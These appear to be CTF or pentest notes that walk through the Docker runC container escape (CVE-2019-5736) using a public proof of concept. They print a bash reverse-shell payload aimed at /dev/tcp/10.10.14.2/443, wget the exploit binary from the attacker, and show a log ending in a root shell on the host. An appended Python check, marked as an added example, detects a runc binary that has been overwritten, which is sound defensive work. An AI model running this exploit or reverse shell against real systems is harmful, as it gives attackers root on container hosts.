5 privesc docker runC exploit

Using https://github.com/Frichetten/CVE-2019-5736-PoC

The vulnerability allows a malicious container to overwrite the host runc binary and thus gain root-level code execution on the host. The only user interaction required is the ability to run a command inside the container.

1. Update the payload in main.go:

   var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.2/443 0>&1"

2. Compile it with go build main.go.

3. Move that binary to the container you'd like to escape from.

4. Execute the binary; the next time someone attaches to the container and calls /bin/sh, the payload fires.

go build main.go

<start a python-server>
<start-nc-listener>

Terminal-1

sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
root@0f4c2517af40:/opt/webapp# wget 10.10.14.2/main
root@0f4c2517af40:/opt/webapp# chmod +x main
root@0f4c2517af40:/opt/webapp# ./main
[+] Overwritten /bin/sh successfully

<START TERMINAL-2 COMMAND>
[+] Found the PID: 2453
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc00033e060}

Terminal-2

No help topic for '/bin/sh'

NC Listener

$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.230] 42568
bash: cannot set terminal process group (1632): Inappropriate ioctl for device
bash: no job control in this shell
<4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# whoami
whoami
root
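What the overwrite looks like from the host side, as an added example that is not part of these notes or the PoC repository: a Python integrity check that flags a runc binary that is no longer an ELF file (the exploit leaves a bash script in its place) and, when a known-good SHA-256 from the package database is supplied, a hash mismatch. The default path /usr/bin/runc and the sample bytes in demo() are constructed assumptions.

```python
"""Host-side integrity check for the runc binary (added example, not PoC code).
CVE-2019-5736 leaves the host's runc replaced by the attacker's script, so the
indicators are: runc is no longer an ELF file, or its hash no longer matches."""
import hashlib
import os
import sys
import tempfile

ELF_MAGIC = b"\x7fELF"


def check_runc_binary(path, known_good_sha256=None):
    """Return a dict describing whether `path` still looks like a genuine runc."""
    with open(path, "rb") as f:
        data = f.read()
    is_elf = data[:4] == ELF_MAGIC
    digest = hashlib.sha256(data).hexdigest()
    # Hash comparison only means something when the caller supplies a reference
    # value (e.g. from the distro package); without one we rely on ELF magic alone.
    hash_match = None if known_good_sha256 is None else digest == known_good_sha256.lower()
    suspicious = (not is_elf) or (hash_match is False)
    return {"path": path, "is_elf": is_elf, "sha256": digest,
            "hash_match": hash_match, "suspicious": suspicious}


def _write_sample(data):
    """Write constructed sample bytes to a temp file and return its path."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo():
    """Constructed samples: an ELF-header stub and a bash script written over runc."""
    good = _write_sample(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9 + b"stub-runc")
    bad = _write_sample(b"#!/bin/bash\n# script body dropped in place of runc\n")
    reference = hashlib.sha256(open(good, "rb").read()).hexdigest()
    results = [check_runc_binary(good, reference), check_runc_binary(bad, reference)]
    for p in (good, bad):
        os.unlink(p)
    return results


if __name__ == "__main__":
    # Assumption: runc lives at /usr/bin/runc; pass another path as argv[1].
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/bin/runc"
    result = check_runc_binary(target)
    print("SUSPICIOUS" if result["suspicious"] else "OK", result)
```

Run it periodically (or from a file-integrity monitor) on the Docker host; a non-ELF runc is a reliable post-exploitation indicator for this CVE, while the fix itself is updating runc.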
